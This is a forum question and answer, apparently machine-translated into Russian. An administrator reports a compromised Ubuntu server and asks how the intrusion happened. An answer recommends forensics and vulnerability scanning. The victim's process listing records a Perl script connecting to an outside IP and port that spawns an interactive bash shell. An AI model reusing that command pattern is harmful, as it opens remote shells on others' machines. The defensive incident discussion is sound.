У меня запущен сервер Ubuntu. Сегодня я обнаружил, что сервер был взломан и используется для DDoS через отчет об оскорблениях Amazon.
На сервере я нашел следующее.
На сервере обнаружены следующие подозрительные файлы.
-rw-r--r-- 1 www-data www-data 759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data 1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data 5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data 1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data 5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data 119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data 73 Feb 1 01:01 conf.n
Следующий процесс был запущен
www-data 8292 10629 0 Jan28 ? 00:00:00 perl /tmp/weiwei.pl 222.186.42.207 5222
www-data 8293 8292 0 Jan28 ? 00:00:00 /bin/bash -i
www-data 8293 8292 0 Jan28 ? 00:00:00 ./huizhen
Я запустил программу clamav, и она удалила /tmp/huizhenвсе /tmp/sishenфайлы, но процессы все еще были запущены weiwei.pl, ./huizhenпоэтому я завершил их вручную.
У меня на сервере запущены следующие службы.
- SSH — не использует порт 22 по умолчанию, только аутентификация по ключу
- MongoDB — Порт открыт для определенной группы безопасности
- Memcache — порт открыт для определенной группы безопасности
- NodeJS — Порт открыт для определенной группы безопасности
- Порты Tomcat - 8080/8443 являются общедоступными для веб-сервиса axis2 и solr
Я предполагаю, что хакер проник через какую-то уязвимость tomcat/axis2/solr, поскольку процессы запущены с использованием той же группы пользователей, что и tomcat.
Я заблокировал порты 8080/8443 на данный момент и заменю сервер на новый. Tomcat будет доступен с другого сервера через nginx. Я также установил исправления безопасности с помощьюавтоматические обновления.
Проблема в том, как узнать, как хакер проник и внедрил трояны. Какие еще шаги я могу предпринять, чтобы усилить безопасность.
решение1
Это вполне резонный вопрос. Строго говоря, лучшим вариантом для ответа на него было бы заморозить систему и провести криминалистические тесты. Любое последующее вмешательство с вашей стороны, включая удаление вируса, изменит и, возможно, полностью сотрет любую хлебную крошку, оставленную вашим злоумышленником.
Учитывая, что этот путь для вас больше не открыт, лучшим решением будет использовать сканер уязвимостей, программуто естьразработанный именно для того, чтобы провести стресс-тест вашей установки. Есть очень много, вы можете просто погуглить термин Vulnerability Scanner, но на сегодняшний день наиболее известным являетсяНессус. Он поставляется в нескольких версиях, от бесплатной до платной с различными лицензиями, и может оказаться довольно дорогим, возможно, даже больше, чем вы готовы выложить.
Однако существует также бесплатная версия, которая предустановлена наКали Линукс. Вам придется зарегистрировать его, хотя он полностью бесплатный. Многие из нас используют Kali, устанавливая его на виртуальную машину на ноутбуке, а затем выполняя стресс-тесты вне дома, чтобы увидеть, какие дефекты (=неисправленные, известные уязвимости, чаще всего) остались в приложениях, работающих на сервере с выходом в Интернет.
В Интернете есть руководства, обучающие тому, как это использовать, и вы можете попробовать это также в своей собственной локальной сети (если вы доверяете своему брандмауэру) и даже с того же компьютера, если вы будете запускать Kali как виртуальную машину.